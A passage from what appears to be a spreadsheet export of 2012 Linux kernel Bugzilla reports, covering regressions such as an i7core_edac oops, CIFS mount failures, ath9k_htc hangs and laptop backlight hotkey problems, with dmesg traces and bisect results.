35.797048] RIP [&lt;ffffffff8132a77d&gt;] memcpy+0xd/0x110 [ 35.798523] RSP &lt;ffff880107d45c50&gt; [ 35.799997] CR2: 0000000000ff1000 [ 35.801519] ---[ end trace 8c3c13c17f8d7703 ]--- [ 35.821144] ACPI Warning: 0x0000000000008000-0x000000000000801f SystemIO conflicts with Region \_SB_.PCI0.SBUS.SMBI 1 (20120320/utaddress-251) [ 35.824180] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 35.870860] mei 0000:00:16.0: setting latency timer to 64 [ 35.872501] mei 0000:00:16.0: irq 42 for MSI/MSI-X [ 35.874084] genirq: Threaded irq requested with handler=NULL and !ONESHOT for irq 42 [...] --- CUT --- Suspend work on kernel &lt; 3.5.0: (3.4.x, 3.2.x, etc...): --- CUT --- [ 35.105711] lp: driver loaded but no devices found [ 35.498875] EXT4-fs (sda6): re-mounted. Opts: errors=remount-ro [ 35.544416] evbug: Connected device: input0 (Power Button at PNP0C0C/button/input0) [ 35.544422] evbug: Connected device: input1 (Lid Switch at PNP0C0D/button/input0) [ 35.544426] evbug: Connected device: input2 (Power Button at LNXPWRBN/button/input0) [ 35.544430] evbug: Connected device: input3 (AT Translated Set 2 keyboard at isa0060/serio0/input0) [ 35.544435] evbug: Connected device: input4 (Video Bus at LNXVIDEO/video/input0) [ 35.560529] wmi: Mapper loaded [ 35.579247] sony_laptop: Sony Notebook Control Driver v0.6 [ 35.620244] cfg80211: Calling CRDA to update world regulatory domain [ 35.623608] i801_smbus 0000:00:1f.3: PCI INT C -&gt; GSI 19 (level, low) -&gt; IRQ 19 [ 35.623617] ACPI: resource 0000:00:1f.3 [io 0x8000-0x801f] conflicts with ACPI region SMBI [io 0x8000-0x800f] [ 35.623620] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 35.633422] mei: module is from the staging directory, the quality is unknown, you have been warned. [ 35.633910] mei 0000:00:16.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 35.633919] mei 0000:00:16.0: setting latency timer to 64 [ 35.633999] mei 0000:00:16.0: irq 42 for MSI/MSI-X [ 35.640640] input: PC Speaker as /devices/platform/pcspkr/input/input5 [ 35.640738] evbug: Connected device: input5 (PC Speaker at isa0061/input0) [ 35.644079] Intel(R) Wireless WiFi Link AGN driver for Linux, in-tree: [ 35.644083] Copyright(c) 2003-2011 Intel Corporation --- CUT --- I tested 3.6/3.7-rc kernel but problem persist. The problem does not seem to be related to a specific distribution, as can be seen at the following link: Ubuntu 12.10: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1069707/comments/35 Fedora 16:https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1069707/comments/38 Thanks in advance for support. Salvatore</t>
  </si>
  <si>
    <t>Memory usage doubles after more then 20 hours of uptime.</t>
  </si>
  <si>
    <t>2012-11-06 15:11 UTC</t>
  </si>
  <si>
    <t>Milos Jakovljevic</t>
  </si>
  <si>
    <t>2013-11-19 21:47 UTC</t>
  </si>
  <si>
    <t>Created attachment 85721 [details] kernel config file After 20 hours of uptime, memory usage starts going up. Normal usage for my system was around 2.5GB max with all my apps and services up and running. But with 3.7-rc3 and now -rc4 kernel, after more then 20 hours of uptime, it starts to going up. With kernel before 3.7-rc3, my machine could be up for 10 days and not go beyond 2.6GB memory usage. If I start some app that uses a lot of memory, when there is already 4 or even 6GB used already, insted of freeing the memory, it starts to swap it, and everything slows down with a lot of iowait. Here is "free -m" output after 24 hours of uptime: free -m total used free shared buffers cached Mem: 7989 7563 426 0 146 2772 -/+ buffers/cache: 4643 3345 Swap: 1953 688 1264 I know that it is ok for memory to be used this much for buffers and cache, but it is not normal not to relase it when it is needed. In attachment is my kernel config file.</t>
  </si>
  <si>
    <t>[BISECTED]ath9k_htc-based adapter unfunctioning after commit ceb26a6013</t>
  </si>
  <si>
    <t>3.7 and newer</t>
  </si>
  <si>
    <t>2012-11-12 21:45 UTC</t>
  </si>
  <si>
    <t>Corey Richardson</t>
  </si>
  <si>
    <t>2013-10-15 15:59 UTC</t>
  </si>
  <si>
    <t>Created attachment 86201 [details] complete dmesg I was giving 3.7-rc4 a whirl when I discovered my wireless adapter [0] wasn't working: the LED didn't light up. Went and ran 'ip link' and it just hung there. Tried a few other things and discovered that sudo was broken too. With strace I found that they were hanging in sendto(). If I then unplug the adapter, everything comes out of the hang. Bisected and found that commit ceb26a6013b962b82f644189ea29d802490fc8fc is to blame. Attached is my .config,. The complete dmesg is attached, as well as dmesg_disconnect which is what gets spat out on disconnect of the device. strace is an strace of 'ip link'. I feel like I haven't given enough information; anything else needed? [0] - http://support.netgear.com/product/WNA1100</t>
  </si>
  <si>
    <t>rmmod/modprobe i7core_edac leads to kernel oops</t>
  </si>
  <si>
    <t>3.0.39, 3.5.0, 3.7-rc5</t>
  </si>
  <si>
    <t>2012-11-13 13:55 UTC</t>
  </si>
  <si>
    <t>2013-11-19 18:44 UTC</t>
  </si>
  <si>
    <t>If I run the following on my system: # while rmmod i7core_edac ; do modprobe i7core_edac ; done I quickly get a flood of warning and error messages in the kernel logs. First I get 3 correct cycles: EDAC PCI: Removed device 0 for i7core_edac EDAC PCI controller: DEV 0000:ff:03.0 EDAC MC: Removed device 0 for i7core_edac.c i7 core #0: DEV 0000:ff:03.0 EDAC MC0: Giving out device to 'i7core_edac.c' 'i7 core #0': DEV 0000:ff:03.0 EDAC PCI1: Giving out device to module 'i7core_edac' controller 'EDAC PCI controller': DEV '0000:ff:03.0' (POLLED) EDAC i7core: Driver loaded, 1 memory controller(s) found. but then a first failure occurs: EDAC PCI: Removed device 3 for i7core_edac EDAC PCI controller: DEV 0000:ff:03.0 EDAC MC: Removed device 0 for i7core_edac.c i7 core #0: DEV 0000:ff:03.0 EDAC i7core: Device not found: dev 00.0 PCI ID 8086:2c41 This last message is repeated a hundred times or so, and finally a WARNING followed by a BUG. ------------[ cut here ]------------ WARNING: at include/linux/kref.h:42 klist_next+0xba/0x110() Hardware name: System Product Name Modules linked in: i7core_edac(+) fuse xt_tcpudp xt_pkttype xt_physdev xt_LOG xt_limit nfsd lockd nfs_acl auth_rpcgss sunrpc bridge stp llc ip6t_REJECT nf_conntrack_ipv6 nf_defrag_ipv6 ip6table_raw ipt_REJECT iptable_raw iptable_filter ip6table_mangle nf_conntrack_netbios_ns nf_conntrack_broadcast nf_conntrack_ipv4 nf_defrag_ipv4 ip_tables xt_conntrack nf_conntrack ip6table_filter ip6_tables x_tables cpufreq_conservative cpufreq_userspace cpufreq_powersave acpi_cpufreq mperf nls_utf8 loop snd_hda_codec_hdmi mt2060 snd_hda_codec_realtek snd_hda_intel snd_hda_codec e1000e container snd_hwdep snd_pcm button edac_core sr_mod dvb_usb_dib0700 dib0090 dib7000p dib7000m dib0070 dvb_usb dib8000 dvb_core dib3000mc rc_core sg iTCO_wdt iTCO_vendor_support coretemp kvm_intel kvm i2c_mux_gpio i2c_mux gpio_ich lpc_ich i2c_i801 crc32c_intel dibx000_common cdrom pcspkr microcode snd_timer snd edd soundcore snd_page_alloc autofs4 radeon ttm rtc_cmos drm_kms_helper drm i2c_algo_bit processor thermal_sys ata_generic [last unloaded: i7core_edac] Pid: 10962, comm: modprobe Not tainted 3.7.0-rc5 #12 Call Trace: [&lt;ffffffff8104501c&gt;] warn_slowpath_common+0x8c/0xc0 [&lt;ffffffff81045065&gt;] warn_slowpath_null+0x15/0x20 [&lt;ffffffff815c34ea&gt;] klist_next+0xba/0x110 [&lt;ffffffff81317ac0&gt;] ? pci_do_find_bus+0x60/0x60 [&lt;ffffffff813be319&gt;] next_device+0x9/0x30 [&lt;ffffffff813beaf9&gt;] bus_find_device+0x69/0x90 [&lt;ffffffff81317b9b&gt;] pci_get_dev_by_id+0x6b/0xb0 [&lt;ffffffff81317ce0&gt;] pci_get_subsys+0x30/0x40 [&lt;ffffffff81317d03&gt;] pci_get_device+0x13/0x20 [&lt;ffffffffa0331448&gt;] i7core_get_onedevice+0x3c/0x28e [i7core_edac] [&lt;ffffffffa033177e&gt;] i7core_probe+0x8e/0x16e [i7core_edac] [&lt;ffffffff81316524&gt;] local_pci_probe+0x74/0x100 [&lt;ffffffff81316679&gt;] __pci_device_probe+0xc9/0xf0 [&lt;ffffffff81316c05&gt;] pci_device_probe+0x35/0x60 [&lt;ffffffff813c022f&gt;] really_probe+0x10f/0x2f0 [&lt;ffffffff813c05bb&gt;] driver_probe_device+0x7b/0xa0 [&lt;ffffffff813c063f&gt;] __driver_attach+0x5f/0x90 [&lt;ffffffff813c05e0&gt;] ? driver_probe_device+0xa0/0xa0 [&lt;ffffffff813be609&gt;] bus_for_each_dev+0x49/0x80 [&lt;ffffffff813bfe69&gt;] driver_attach+0x19/0x20 [&lt;ffffffff813bf83b&gt;] bus_add_driver+0xdb/0x260 [&lt;ffffffffa038d000&gt;] ? 0xffffffffa038cfff [&lt;ffffffff813c0c68&gt;] driver_register+0xa8/0x150 [&lt;ffffffffa038d000&gt;] ? 0xffffffffa038cfff [&lt;ffffffff81316d1c&gt;] __pci_register_driver+0x5c/0x70 [&lt;ffffffffa038d093&gt;] i7core_init+0x93/0x1000 [i7core_edac] [&lt;ffffffff8100024a&gt;] do_one_initcall+0x8a/0x160 [&lt;ffffffff810a99b5&gt;] sys_init_module+0xc5/0x220 [&lt;ffffffff815ff829&gt;] system_call_fastpath+0x16/0x1b ---[ end trace e1e91b09c80c8edb ]--- BUG: unable to handle kernel NULL pointer dereference at 0000000000000030 IP: [&lt;ffffffff815c30b8&gt;] klist_put+0x28/0xa0 PGD 13699d067 PUD 137f4d067 PMD 0 Oops: 0000 [#1] PREEMPT SMP Modules linked in: i7core_edac(+) fuse xt_tcpudp xt_pkttype xt_physdev xt_LOG xt_limit nfsd lockd nfs_acl auth_rpcgss sunrpc bridge stp llc ip6t_REJECT nf_conntrack_ipv6 nf_defrag_ipv6 ip6table_raw ipt_REJECT iptable_raw iptable_filter ip6table_mangle nf_conntrack_netbios_ns nf_conntrack_broadcast nf_conntrack_ipv4 nf_defrag_ipv4 ip_tables xt_conntrack nf_conntrack ip6table_filter ip6_tables x_tables cpufreq_conservative cpufreq_userspace cpufreq_powersave acpi_cpufreq mperf nls_utf8 loop snd_hda_codec_hdmi mt2060 snd_hda_codec_realtek snd_hda_intel snd_hda_codec e1000e container snd_hwdep snd_pcm button edac_core sr_mod dvb_usb_dib0700 dib0090 dib7000p dib7000m dib0070 dvb_usb dib8000 dvb_core dib3000mc rc_core sg iTCO_wdt iTCO_vendor_support coretemp kvm_intel kvm i2c_mux_gpio i2c_mux gpio_ich lpc_ich i2c_i801 crc32c_intel dibx000_common cdrom pcspkr microcode snd_timer snd edd soundcore snd_page_alloc autofs4 radeon ttm rtc_cmos drm_kms_helper drm i2c_algo_bit processor thermal_sys ata_generic [last unloaded: i7core_edac] CPU 6 Pid: 10962, comm: modprobe Tainted: G W 3.7.0-rc5 #12 System manufacturer System Product Name/Z8NA-D6(C) [26130.232897] RIP: 0010:[&lt;ffffffff815c30b8&gt;] [&lt;ffffffff815c30b8&gt;] klist_put+0x28/0xa0 RSP: 0018:ffff880125389af8 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00000000cb2dcb2c RDX: 00000000000035f0 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffff880125389b18 R08: ffffffff81e41cdc R09: ffffffff81e61e20 R10: 0000000000000044 R11: 000000000001fef0 R12: ffff8801391b24b8 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000001 FS: 00007fca8695c700(0000) GS:ffff88013f2c0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000030 CR3: 00000001357d5000 CR4: 00000000000007e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process modprobe (pid: 10962, threadinfo ffff880125388000, task ffff880037a68700) Stack: ffff880125389b48 ffffffff81317ac0 0000000000000000 ffffffffa0332640 ffff880125389b38 ffffffff815c314c ffff880125389b38 ffff880125389bb8 ffff880125389b78 ffffffff813beb0a ffff8801397a68d8 ffff8801391b24b8 Call Trace: [&lt;ffffffff81317ac0&gt;] ? pci_do_find_bus+0x60/0x60 [&lt;ffffffff815c314c&gt;] klist_iter_exit+0x1c/0x30 [&lt;ffffffff813beb0a&gt;] bus_find_device+0x7a/0x90 [&lt;ffffffff81317b9b&gt;] pci_get_dev_by_id+0x6b/0xb0 [&lt;ffffffff81317ce0&gt;] pci_get_subsys+0x30/0x40 [&lt;ffffffff81317d03&gt;] pci_get_device+0x13/0x20 [&lt;ffffffffa0331448&gt;] i7core_get_onedevice+0x3c/0x28e [i7core_edac] [&lt;ffffffffa033177e&gt;] i7core_probe+0x8e/0x16e [i7core_edac] [&lt;ffffffff81316524&gt;] local_pci_probe+0x74/0x100 [&lt;ffffffff81316679&gt;] __pci_device_probe+0xc9/0xf0 [&lt;ffffffff81316c05&gt;] pci_device_probe+0x35/0x60 [&lt;ffffffff813c022f&gt;] really_probe+0x10f/0x2f0 [&lt;ffffffff813c05bb&gt;] driver_probe_device+0x7b/0xa0 [&lt;ffffffff813c063f&gt;] __driver_attach+0x5f/0x90 [&lt;ffffffff813c05e0&gt;] ? driver_probe_device+0xa0/0xa0 [&lt;ffffffff813be609&gt;] bus_for_each_dev+0x49/0x80 [&lt;ffffffff813bfe69&gt;] driver_attach+0x19/0x20 [&lt;ffffffff813bf83b&gt;] bus_add_driver+0xdb/0x260 [&lt;ffffffffa038d000&gt;] ? 0xffffffffa038cfff [&lt;ffffffff813c0c68&gt;] driver_register+0xa8/0x150 [&lt;ffffffffa038d000&gt;] ? 0xffffffffa038cfff [&lt;ffffffff81316d1c&gt;] __pci_register_driver+0x5c/0x70 [&lt;ffffffffa038d093&gt;] i7core_init+0x93/0x1000 [i7core_edac] [&lt;ffffffff8100024a&gt;] do_one_initcall+0x8a/0x160 [&lt;ffffffff810a99b5&gt;] sys_init_module+0xc5/0x220 [&lt;ffffffff815ff829&gt;] system_call_fastpath+0x16/0x1b Code: 00 00 00 55 48 89 e5 48 83 ec 20 4c 89 65 e8 49 89 fc 4c 89 75 f8 41 89 f6 48 89 5d e0 4c 89 6d f0 48 8b 1f 48 83 e3 fe 48 89 df &lt;4c&gt; 8b 6b 30 e8 4f 51 03 00 45 84 f6 74 2a 49 8b 04 24 a8 01 74 RIP [&lt;ffffffff815c30b8&gt;] klist_put+0x28/0xa0 RSP &lt;ffff880125389af8&gt; CR2: 0000000000000030 ---[ end trace e1e91b09c80c8edc ]--- A further call to lspci shows the following error: lspci: Cannot open /sys/bus/pci/devices/0000:ff:00.0/resource: No such file or directory PCI device 0000:ff:00.0 has simply disappeared (symbolic link /sys/bus/pci/devices/0000:ff:00.0 points to a nonexistent directory.)</t>
  </si>
  <si>
    <t>3.5.7</t>
  </si>
  <si>
    <t>CIFS mount fails on kernels after 3.3.8</t>
  </si>
  <si>
    <t>P3 normal</t>
  </si>
  <si>
    <t>3.4.5+</t>
  </si>
  <si>
    <t>2012-11-16 00:41 UTC</t>
  </si>
  <si>
    <t>Alex Miller</t>
  </si>
  <si>
    <t>2013-11-19 18:41 UTC</t>
  </si>
  <si>
    <t>Created attachment 86481 [details] Log of git bisect between 3.3.8 and 3.4.5 Mounting a CIFS file share fails with kernels &gt;3.3.8. The following messages are logged to dmesg: CIFS VFS: Connecting to DFS root not implemented yet CIFS VFS: cifs_mount failed w/return code = -22 Reproducible: Always Steps to Reproduce: 1.Boot with a kernel &gt;3.38 2.Attempt to mount a CIFS file share using a command similar to: mount -t cifs //192.168.0.1/alex /mnt/server -o user=alex,password=(*edited*) Actual Results: mount: wrong fs type, bad option, bad superblock on //192.168.0.1/alex, missing codepage or helper program, or other error (for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.&lt;type&gt; helper program) In some cases useful info is found in syslog - try dmesg | tail or so The following is logged to dmesg: CIFS VFS: Connecting to DFS root not implemented yet CIFS VFS: cifs_mount failed w/return code = -22 Expected Results: The file share mounts successfully. A git bisect between 3.3.8 and 3.4.5 points to this patch as being responsible: 8830d7e07a5e38bc47650a7554b7c1cfd49902bf is the first bad commit commit 8830d7e07a5e38bc47650a7554b7c1cfd49902bf Author: Sachin Prabhu &lt;sprabhu@redhat.com&gt; Date: Fri Mar 23 14:40:56 2012 -0400 cifs: use standard token parser for mount options Use the standard token parser instead of the long if condition to parse cifs mount options. This was first proposed by Scott Lovenberg http://lists.samba.org/archive/linux-cifs-client/2010-May/006079.html</t>
  </si>
  <si>
    <t>USB attached SCSI loops the scsi stack</t>
  </si>
  <si>
    <t>3.6.6 3.7-rc6 3.7-rc7</t>
  </si>
  <si>
    <t>2012-11-26 17:51 UTC</t>
  </si>
  <si>
    <t>2013-11-19 18:37 UTC</t>
  </si>
  <si>
    <t>Created attachment 87331 [details] syslog kernel output Connecting my Dell 1TB portable external hard drive USB 3.0 PDA1000B to my USB 3.0 computer causes serious problems to the SCSI stack. Attached is the log when connecting and disconnecting the device. The uas/scsi stack seems to not be able to get out an infinite loop. The system is not even able to halt cleanly (dunno why, but it stops after mount / readonly on gentoo).</t>
  </si>
  <si>
    <t>Acer Aspire S7 Brightness changes but hotkeys do not work</t>
  </si>
  <si>
    <t>3.6.7-4</t>
  </si>
  <si>
    <t>2012-11-27 23:03 UTC</t>
  </si>
  <si>
    <t>Kevin Anderson</t>
  </si>
  <si>
    <t>2013-07-22 01:05 UTC</t>
  </si>
  <si>
    <t>Acer Aspire S7-391 Fedora 17 Intel 4000HD Onboard Graphics With no acpi options specified for the kernel two devices are shown under /sys/class/backlight. They are intel_backlight and something along the line of acpi_video. Adding acpi_osi=Linux acpi_backlight=vendor to the boot arguments gets rid of the acpi entry under backlights and leave only the intel_backlight. This allows tools such as gnome power manager to adjust the backlight successfully. Adding the boot options has the side effect of disabling the brightness hot keys completely. Using xev and showkey show no key presses being registered. If the boot options are removed then the hot keys function but do not actually change the backlight. Also I can sucessfully echo a brightness value in to /sys/class/backlight/intel_backlight/brightness at any time with any boot options and have it take effect. Steps to reproduce: 1. Add acpi_osi=Linux acpi_backlight=vendor to kernel command line 2. See only intel_backlight under /sys/class/backlight 3. Try to use brightness keys and see they don't register Actual results: 1. Function keys to change brightness do not actually register but brightness can be changed through gnome power applets Expected results: 1. Brightness function keys should register and brightness should be changed with them</t>
  </si>
  <si>
    <t>Resume of T61 in docking stations may lead to freeze</t>
  </si>
  <si>
    <t>2012-11-28 16:16 UTC</t>
  </si>
  <si>
    <t>2013-02-08 17:39 UTC</t>
  </si>
  <si>
    <t>Created attachment 87581 [details] Snapshot of OOPS I'm opening this bug for tracking issue reported on lkml: https://lkml.org/lkml/2012/11/15/369 Easiest to provide picture for me - since I cannot get OOPS easily in text. My hw is: T61 C2D 4GB GMA965 Docking station - default supplied for this laptop type. Problem is that resume of my laptop suspended outside of docking station usually leads to system freeze. But there are multiple ways how the freeze lookalike - sometimes I get only 'black screen' and sometimes I get this OOPS (not complete - screen is too short) I've tried few kernels back - and noticed that even 3.4 does not survive multiple 'pm-suspend' &amp; resume cycles (usually 1 - at best 2, but 3 is 100% deadlock). I'll try to add more details if I'll notice something new. For now I know this: The problem is somehow related to the support of 'old hw' on docking station (which is i.e. serial line port). If I disable this support in BIOS it seems to be stable - no problem with suspend/resume.</t>
  </si>
  <si>
    <t>ACPI display backlight brightness is set to zero at every boot-up - HP Folio 13-2000</t>
  </si>
  <si>
    <t>3.6.8</t>
  </si>
  <si>
    <t>2012-11-30 00:54 UTC</t>
  </si>
  <si>
    <t>Stefan Nagy</t>
  </si>
  <si>
    <t>2013-11-18 07:01 UTC</t>
  </si>
  <si>
    <t>Created attachment 87851 [details] dmesg log (kernel 3.6.8) Every time I boot-up my notebook's display stays black. Since most of the time I'm using an external display I found out that the backlight brightness in GNOME settings is set to zero – I can temporarily solve the issue by increasing the screen brightness but next time I boot this setting is lost, screen brightness is set back to zero again. Using the kernel boot parameter i915.invert_brightness=1 works fine as workaround. When I looked into /sys/class/backlight/acpi_video0/brightness to confirm that it's set to zero I realized that I have two entries in backlight: - 'acpi_video0' (with brightness set to 0, actual_brightness set to 0) and - 'intel_backlight' (with brightness set to 4882, actual_brightness set to 0). When I increase screen brightness to 100% in GNOME settings, the values change to: - 'acpi_video0' brightness &amp; actual_brightness 10, - 'intel_backlight' brightness &amp; actual_brightness 4882. Next time I boot, ACPI display backlight brightness is set to 0 again. I'm affected by this bug since kernel v3.6, before that I was affected by Bug #46481. My notebook is a HP Folio 13-200, I'll attach a dmesg-log and the output of acpidump.</t>
  </si>
  <si>
    <t>Backlight keys stopped working, unless acpi_osi="!Windows 2012" - Thinkpad t430s - BISECTED</t>
  </si>
  <si>
    <t>3.7.0-rc7</t>
  </si>
  <si>
    <t>2012-12-02 16:52 UTC</t>
  </si>
  <si>
    <t>Peter Weber</t>
  </si>
  <si>
    <t>2015-04-25 13:27 UTC</t>
  </si>
  <si>
    <t>57131 62941 63811 67031 68751</t>
  </si>
  <si>
    <t>Created attachment 88171 [details] config of kernel 3.7.0-rc7 Hello! The backlight keys (Fn+F8, Fn+F9) stopped working with Kernel 3.7.0-rc7. It works with the current stable Kernel 3.6.8. I can still change the backlight brightness via "System Settings" &gt; "Brightness &amp; Lock" in GNOME. I can't see any message about not working keys in dmesg or the syslog. I should note, that the brightness-indicator of GNOME shows if I press one of the keys and it moves the progress-bar a ittle bit. After I changedthe brigthness via "System Settings" it is possible to use the keys to change the brightness over a wider range, but not the complete range. Seems to be some side effect. Maximal movement of of brightness, visuallay: Default: [ x x x x x x x - ] After I changed the brightness to the middle, via "System Settings": [ x x - - - - x x ] Sorry for the weird report. Thank you.</t>
  </si>
  <si>
    <t>ext4_mb_generate_buddy self ext4 errors</t>
  </si>
  <si>
    <t>3.0.54</t>
  </si>
  <si>
    <t>2012-12-08 11:41 UTC</t>
  </si>
  <si>
    <t>zakrzewskim</t>
  </si>
  <si>
    <t>2013-11-19 18:21 UTC</t>
  </si>
  <si>
    <t>I'm getting ext4 errors in dmesg even if I unmount partition then make e4fsck -fy -C0 /dev/md2. I looks like this parition is mounted with no errors: EXT4-fs (md2): mounted filesystem with ordered data mode. Opts: usrjquota=aquota.user,grpjquota=aquota.group,usrquota,grpquota,jqfmt=vfsv0 then after few hours it shows itself: EXT4-fs (md2): error count: 7 EXT4-fs (md2): initial error at 1354656587: ext4_mb_generate_buddy:736 EXT4-fs (md2): last error at 1354664617: ext4_ext_split:929: inode 97911179 So far no other issues. Disks are fine. SMART ok. RAM checked with memtest and ok. Partition mounted like this: /dev/md2 /home ext4 rw,noatime,nodiratime,usrjquota=aquota.user,grpjquota=aquota.group,usrquota,grpquota,jqfmt=vfsv0 0 0 /dev/md2 2,7T 1,8T 885G 68% /home md2 : active raid1 sdd3[2] sdc3[0] 2914280100 blocks super 1.0 [2/2] [UU] It happens only on 2x 3 TB RAID1 array.</t>
  </si>
  <si>
    <t>pcie_aspm: unable to enable ASPM when battery powered - Clevo W150HRM</t>
  </si>
  <si>
    <t>3.6.9+</t>
  </si>
  <si>
    <t>2012-12-10 12:07 UTC</t>
  </si>
  <si>
    <t>2013-06-10 23:17 UTC</t>
  </si>
  <si>
    <t>On my Clevo W150HRM laptop (i7 2720QM CPU, HM65 chipset; please see dmidecode output for details) with the 3.5.7 kernel, by echoing "powersave" to /sys/module/pcie_aspm/parameters/policy I could turn PCIE ASPM on; I noticed that with the 3.6.9 kernel this works only when the power supply is connected: when on battery power it has no effect at all. I still have to test previous 3.6 minor releases, but I have a feeling that all 3.6 releases are equally affected. I'm running with pcie_aspm=force to overcome the "ACPI _OSC support notification failed, disabling PCIe ASPM" issue.</t>
  </si>
  <si>
    <t>Patch to support 0458:7045 KYE Systems Corp. (Mouse Systems) Genius Look 1320 V2</t>
  </si>
  <si>
    <t>2012-12-10 15:17 UTC</t>
  </si>
  <si>
    <t>Vyacheslav Dikonov</t>
  </si>
  <si>
    <t>2016-01-20 23:32 UTC</t>
  </si>
  <si>
    <t>Created attachment 88841 [details] Support for 0458:7045 KYE Systems Corp. (Mouse Systems) Genius Look 1320 V2 Please add to the default source. This is a one line patch that makes the device recognizable. Otherwise it actually works "out of the box" now.</t>
  </si>
  <si>
    <t>Computer stops working after power supply introduced</t>
  </si>
  <si>
    <t>2012-12-13 00:21 UTC</t>
  </si>
  <si>
    <t>William Giokas</t>
  </si>
  <si>
    <t>2013-01-28 23:20 UTC</t>
  </si>
  <si>
    <t>After upgrading from 3.7-rc8 to 3.7, I can no longer plug in the power supply to my laptop and not freeze everything. Downgrading to 3.7-rc8 fixes the problem. Steps to reproduce: 1) Install linux 3.7 2) Unplug power supply if connected 3) Plug power supply back in Results: Computer becomes wholly unresponsive. Expected results: Computer should continue working fine. Build date and platform: Build Date : Tue 11 Dec 2012 12:30:56 AM CST Platform : Arch Linux Additional Information: I ran a git bisect from 3.7-rc8 to 3.7, and this seems to be the offending commit: 8d4516904b39507458bee8115793528e12b1d8dd is the first bad commit commit 8d4516904b39507458bee8115793528e12b1d8dd Author: Thomas Gleixner &lt;tglx@linutronix.de&gt; Date: Tue Dec 4 18:59:34 2012 +0100 watchdog: Fix CPU hotplug regression Norbert reported: "3.7-rc6 booted with nmi_watchdog=0 fails to suspend to RAM or offline CPUs. It's reproducable with a KVM guest and physical system." The reason is that commit bcd951cf(watchdog: Use hotplug thread infrastructure) missed to take this into account. So the cpu offline code gets stuck in the teardown function because it accesses non initialized data structures. Add a check for watchdog_enabled into that path to cure the issue. Reported-and-tested-by: Norbert Warmuth &lt;nwarmuth@t-online.de&gt; Tested-by: Joseph Salisbury &lt;joseph.salisbury@canonical.com&gt; Link: http://lkml.kernel.org/r/alpine.LFD.2.02.1211231033230.2701@ionos Link: http://bugs.launchpad.net/bugs/1079534 Signed-off-by: Thomas Gleixner &lt;tglx@linutronix.de&gt; :040000 040000 32962c88d16bc0cf841e114b181163c9450dabde dc9ba81b3cf7a8b40f739855dd9c1a08aaa2fbc5 M kernel Thank you, William Giokas</t>
  </si>
  <si>
    <t>ALX driver unusable on new kernel</t>
  </si>
  <si>
    <t>Backports project</t>
  </si>
  <si>
    <t>Backports</t>
  </si>
  <si>
    <t>3.7.0</t>
  </si>
  <si>
    <t>2012-12-13 05:54 UTC</t>
  </si>
  <si>
    <t>Hexchain Tong</t>
  </si>
  <si>
    <t>2013-07-30 14:10 UTC</t>
  </si>
  <si>
    <t>Backports Project Mailing List</t>
  </si>
  <si>
    <t>After upgraded to kernel 3.7, the ALX driver in compat-drivers nolonger functions. Building is successful, but it is unable to load. dmesg before kernel update, using compat-wireless 20121003: Dec 12 12:12:09 lightning.hexchain.org kernel: alx 0000:03:00.0: DMA to 64-BIT addresses Dec 12 12:12:09 lightning.hexchain.org kernel: alx 0000:03:00.0: (unregistered net_device): HW Flags = 0x415 Dec 12 12:12:09 lightning.hexchain.org kernel: alx 0000:03:00.0: (unregistered net_device): reset PHY, pws = 1, az = 0, ptp = 0 Dec 12 12:12:09 lightning.hexchain.org kernel: alx 0000:03:00.0: (unregistered net_device): speed = 0x2f, autoneg = 1 Dec 12 12:12:09 lightning.hexchain.org kernel: alx 0000:03:00.0: irq 45 for MSI/MSI-X Dec 12 12:12:09 lightning.hexchain.org kernel: alx: Atheros Gigabit Network Connection After kernel update, any version of compat-driver before 20121204 fails to build. dmesg after kernel update, using the newest compat-driver-u: Dec 12 22:31:21 lightning.hexchain.org kernel: alx 0000:03:00.0: DMA to 64-BIT addresses Dec 12 22:31:21 lightning.hexchain.org kernel: alx 0000:03:00.0: config PHY speed/duplex failed,err=4 Dec 12 22:31:21 lightning.hexchain.org kernel: alx 0000:03:00.0: error when probe device, error = -5 Dec 12 22:31:21 lightning.hexchain.org kernel: alx: probe of 0000:03:00.0 failed with error -5</t>
  </si>
  <si>
    <t>Kernel Panic on backlight brightness hotkey usage (Fujitsu Siemens Amilo Pi 2550)</t>
  </si>
  <si>
    <t>&gt;= 3.4</t>
  </si>
  <si>
    <t>2012-12-15 09:27 UTC</t>
  </si>
  <si>
    <t>i-tek</t>
  </si>
  <si>
    <t>2013-05-03 06:03 UTC</t>
  </si>
  <si>
    <t>Created attachment 89281 [details] acpidump I am refering to an error that occurs since I have moved to Lubuntu 12.04. Everytime I try to vary the backlight brightness the complete system freezes on a kernel panic screen (No SysReq-Commands are available). I would have reported this bug to the Ubuntu launchpad but apport advised me to report Upstream kernel errors directly to kernel.org. Furthermore I have tested various kernels from the Ubuntu kernel repo (http://kernel.ubuntu.com/~kernel-ppa/mainline/) to specify in which kernel revision the bug occured at first. Last working version: 3.3.8 (folder: v3.3.8-quantal/) /proc/version: Linux version 3.3.8-030308-generic (apw@gomeisa) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #201206041356 SMP Mon Jun 4 17:57:29 UTC 2012 First non working version: 3.4.0 (folder: v3.4-quantal/) /proc/version: Linux version 3.4.0-030400-generic (apw@gomeisa) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #201205221131 SMP Tue May 22 15:32:22 UTC 2012 Several kernels above 3.4.0 up to 3.7.x showed the same behaviour. The same kernel problems occured in Fedora 18 Beta. Please ask for further needed information.</t>
  </si>
  <si>
    <t>debug build of ath9k fails.</t>
  </si>
  <si>
    <t>3.6.9 - 3.6.10</t>
  </si>
  <si>
    <t>2012-12-16 22:21 UTC</t>
  </si>
  <si>
    <t>arclanceSignup</t>
  </si>
  <si>
    <t>2013-11-24 19:24 UTC</t>
  </si>
  <si>
    <t>HighPoint RocketRAID 2720 fail to detect some SATA hdd</t>
  </si>
  <si>
    <t>2012-12-21 14:28 UTC</t>
